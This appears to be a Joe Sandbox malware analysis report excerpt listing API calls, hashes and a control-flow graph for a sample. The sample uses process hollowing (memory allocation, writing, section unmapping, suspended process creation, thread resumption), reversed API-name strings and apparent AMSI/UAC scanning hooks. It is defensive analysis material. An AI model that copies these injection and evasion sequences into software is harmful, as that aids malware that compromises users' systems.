                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                  • API String ID: 4072585319-445027087
                                                                                                                  • Opcode ID: b7944f35696d8fa0d88669c47bae9bd43ee2b46d50c65a051dfa84362905a463
                                                                                                                  • Instruction ID: 7b142c6918734ee22f869db2d03bc92fba1199bb0bbd562554fd7ed52d104b05
                                                                                                                  • Opcode Fuzzy Hash: b7944f35696d8fa0d88669c47bae9bd43ee2b46d50c65a051dfa84362905a463
                                                                                                                  • Instruction Fuzzy Hash: 67112D756C0208BFEB14EFA4DC45EAEB7AEEB49700F91A461B904D7640E630AA50CB64
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E
                                                                                                                    • Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9
                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E77A9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                  • API String ID: 4072585319-445027087
                                                                                                                  • Opcode ID: f5c207c3b1ef565d94e2bbd094486eba2df0d64e60160b9e9bb9920e0d8c87c8
                                                                                                                  • Instruction ID: d04598c4181d0ad96e038ff5094ffee60f9ef547fb5c7189106f26913854a440
                                                                                                                  • Opcode Fuzzy Hash: f5c207c3b1ef565d94e2bbd094486eba2df0d64e60160b9e9bb9920e0d8c87c8
                                                                                                                  • Instruction Fuzzy Hash: 90112D756C0208BFEB14EFA4DC45EAEB7AEEB49700F91A461B904D7640E630AA50CB64
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E
                                                                                                                    • Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9
                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E78471
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                  • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                  • API String ID: 2521977463-737317276
                                                                                                                  • Opcode ID: 58ec93e2d25d031781a02a530dffc17b52d6a94af8b66690cb163468bfc86584
                                                                                                                  • Instruction ID: dc065f81d873e2aee0bdac9a818fc4a88e4b4d343cce74636a4c5958ff36e904
                                                                                                                  • Opcode Fuzzy Hash: 58ec93e2d25d031781a02a530dffc17b52d6a94af8b66690cb163468bfc86584
                                                                                                                  • Instruction Fuzzy Hash: 66018C746C0308EFEB50EFA8EC49EAAB7EEEB49700F51D420F904D7240E670A940DB20
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E
                                                                                                                    • Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9
                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E77DEC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                  • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                  • API String ID: 2719805696-3542721025
                                                                                                                  • Opcode ID: dcff500738fd12943a15d9904bb8f4f11415ea25c1c79746cc47916f9c873c68
                                                                                                                  • Instruction ID: 2d39ea3be2b2762e36eae9cf91aa307bf65c67b16939920b1a03250b92c1adde
                                                                                                                  • Opcode Fuzzy Hash: dcff500738fd12943a15d9904bb8f4f11415ea25c1c79746cc47916f9c873c68
                                                                                                                  • Instruction Fuzzy Hash: 22014C756C0208AFDB50EF98EC46E9AB7EDEB49B00F50E864B904DB640D630AD50CB64
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E
                                                                                                                    • Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9
                                                                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 02E786D5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                  • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                  • API String ID: 3503870465-2520021413
                                                                                                                  • Opcode ID: 11901e32a8ca82a49c7c008a224b3c9a0ad9def78e056cc17928b96206f924ec
                                                                                                                  • Instruction ID: 6d44230c1406ab31d40a6a364252657131cbc377633086e98a38cb480adeef69
                                                                                                                  • Opcode Fuzzy Hash: 11901e32a8ca82a49c7c008a224b3c9a0ad9def78e056cc17928b96206f924ec
                                                                                                                  • Instruction Fuzzy Hash: 97018F34AC0204AFEB10EFA4DC49A6AB7AEEB59B40F91E460F400D7640D630A940DB24
                                                                                                                  APIs
                                                                                                                  • RtlI.N(?,?,00000000,02E7DC7E), ref: 02E7DC2C
                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02E7DC7E), ref: 02E7DC42
                                                                                                                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02E7DC7E), ref: 02E7DC61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$DeleteFileNameName_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4284456518-0
                                                                                                                  • Opcode ID: ee28776228414725576f848d19c0d5c4117e6abe7faef43b1d328d7b2d735dcd
                                                                                                                  • Instruction ID: 5fe9f4ce313078f8cbd7a313e047362322ccbbc90d1dc3c1bb39fd76299c2b41
                                                                                                                  • Opcode Fuzzy Hash: ee28776228414725576f848d19c0d5c4117e6abe7faef43b1d328d7b2d735dcd
                                                                                                                  • Instruction Fuzzy Hash: 540162759C42086EEB05DBA08D51FCD77B9AF45704F51A4D2A200E6081DBB4AB048B25
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E64F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E64F2E
                                                                                                                  • RtlI.N(?,?,00000000,02E7DC7E), ref: 02E7DC2C
                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02E7DC7E), ref: 02E7DC42
                                                                                                                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02E7DC7E), ref: 02E7DC61
                                                                                                                    • Part of subcall function 02E64C60: SysFreeString.OLEAUT32(02E7F4A4), ref: 02E64C6E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1530111750-0
                                                                                                                  • Opcode ID: c82dcf04d95d47bf9a07cff49e094c92cb187d627ad865cc3f77bfe22f9d866e
                                                                                                                  • Instruction ID: 7f0c06fac6b660c0c4e0020a00d8bb8a60fb45c472593270bd14752b75cef525
                                                                                                                  • Opcode Fuzzy Hash: c82dcf04d95d47bf9a07cff49e094c92cb187d627ad865cc3f77bfe22f9d866e
                                                                                                                  • Instruction Fuzzy Hash: ED01F47198020CBEEB11EBE0DD56FDDB3BDEF49700F5194A1F605E2580EBB46B048A64
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E76D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02E76DB9,?,?,?,00000000), ref: 02E76D99
                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,02E76EAC,00000000,00000000,02E76E2B,?,00000000,02E76E9B), ref: 02E76E17
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFromInstanceProg
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2151042543-0
                                                                                                                  • Opcode ID: 3775be3b5836d822c08ef953648adb294e402b05ac34e5bcae719b27254209dd
                                                                                                                  • Instruction ID: 58caa71857061bf31c019f8c9991a2d0f4a9e90853ae6bf658b9a9cf5073ba64
                                                                                                                  • Opcode Fuzzy Hash: 3775be3b5836d822c08ef953648adb294e402b05ac34e5bcae719b27254209dd
                                                                                                                  • Instruction Fuzzy Hash: FC01F271288B04AEFB11EFA1DC2287FBBADE749B04B519835F505E2A80E6309A00C870

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 4574 2e88128-2e88517 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e648ec 4689 2e8851d-2e886f0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e647ec call 2e649a0 call 2e64d74 call 2e64df0 CreateProcessAsUserW 4574->4689 4690 2e893a1-2e89524 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e648ec 4574->4690 4799 2e8876e-2e88879 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 4689->4799 4800 2e886f2-2e88769 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 4689->4800 4779 2e8952a-2e89539 call 2e648ec 4690->4779 4780 2e89cf5-2e8b2fa call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 * 16 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e77c10 call 2e78338 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 ExitProcess 4690->4780 4779->4780 4788 2e8953f-2e89812 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e7f094 call 2e64860 call 2e649a0 call 2e646d4 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e67e5c 4779->4788 5046 2e89818-2e89aea call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e7e358 call 2e64530 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64de0 * 2 call 2e64764 call 2e7dc8c 4788->5046 5047 2e89aef-2e89cf0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e649f8 call 2e78d70 4788->5047 4900 2e8887b-2e8887e 4799->4900 4901 2e88880-2e88ba0 call 2e649f8 call 2e7de50 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e7d164 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 4799->4901 4800->4799 4900->4901 5217 2e88bb9-2e8939c call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 ResumeThread call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 CloseHandle call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e78080 call 2e7894c * 6 CloseHandle call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 4901->5217 5218 2e88ba2-2e88bb4 call 2e78730 4901->5218 5046->5047 5047->4780 5217->4690 5218->5217
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E789D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02EE738C,Function_0000662C,00000004,02EE739C,02EE738C,05F5E103,00000040,02EE73A0,74B10000,00000000,00000000), ref: 02E78AAA
                                                                                                                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02FDB7E0,02FDB824,OpenSession,02EE7380,02E8B7B8,UacScan,02EE7380), ref: 02E886E9
                                                                                                                  • ResumeThread.KERNEL32(00000000,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8), ref: 02E88D33
                                                                                                                  • CloseHandle.KERNEL32(00000000,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,00000000,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380), ref: 02E88EB2
                                                                                                                    • Part of subcall function 02E7894C: LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize,02EE73A8,02E7A93C,UacScan), ref: 02E78960
